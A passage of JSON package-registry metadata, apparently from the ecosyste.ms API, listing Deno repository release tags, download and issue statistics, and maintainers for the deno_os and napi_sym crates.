/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-26T07:24:49.384Z","dependent_packages_count":0,"downloads":141085,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":95.33405975798588,"dependent_repos_count":23.63229599885272,"dependent_packages_count":31.354080022945645,"stargazers_count":0.0017203709119686203,"forks_count":0.06594755162546379,"docker_downloads_count":null,"average":30.077620740464333},"purl":"pkg:cargo/deno_os","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_os","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_os","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_os/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-25T19:48:12.804Z","issues_count":6610,"pull_requests_count":9623,"avg_time_to_close_issue":17236144.535497494,"avg_time_to_close_pull_request":1534358.7653889374,"issues_closed_count":3787,"pull_requests_closed_count":8008,"pull_request_authors_count":577,"issue_authors_count":2467,"avg_comments_per_issue":2.509531013615734,"avg_comments_per_pull_request":0.7160968512937753,"merged_pull_requests_count":6992,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":664,"past_year_pull_requests_count":1191,"past_year_avg_time_to_close_issue":1367826.3136363637,"past_year_avg_time_to_close_pull_request":1331942.9891472869,"past_year_issues_closed_count":220,"past_year_pull_requests_closed_count":645,"past_year_pull_request_authors_count":182,"past_year_issue_authors_count":368,"past_year_avg_comments_per_issue":1.216867469879518,"past_year_avg_comments_per_pull_request":1.0839630562552478,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":474,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1789,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":386,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":188,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_os/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_os/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_os/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_os/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_os/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_os/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-01-14T04:51:13.251Z","updated_at":"2025-01-14T04:51:13.251Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-01-15T11:36:46.123Z","updated_at":"2025-01-15T11:36:46.123Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":5307679,"name":"napi_sym","ecosystem":"cargo","description":"proc macro for writing N-API symbols","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":187,"first_release_published_at":"2022-10-05T14:14:40.004Z","latest_release_published_at":"2026-08-06T11:47:15.975Z","latest_release_number":"0.187.0","last_synced_at":"2026-08-29T21:57:22.769Z","created_at":"2022-10-05T14:25:30.503Z","updated_at":"2026-08-29T21:57:22.770Z","registry_url":"https://crates.io/crates/napi_sym/","install_command":"cargo install napi_sym","documentation_url":"https://docs.rs/napi_sym/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and 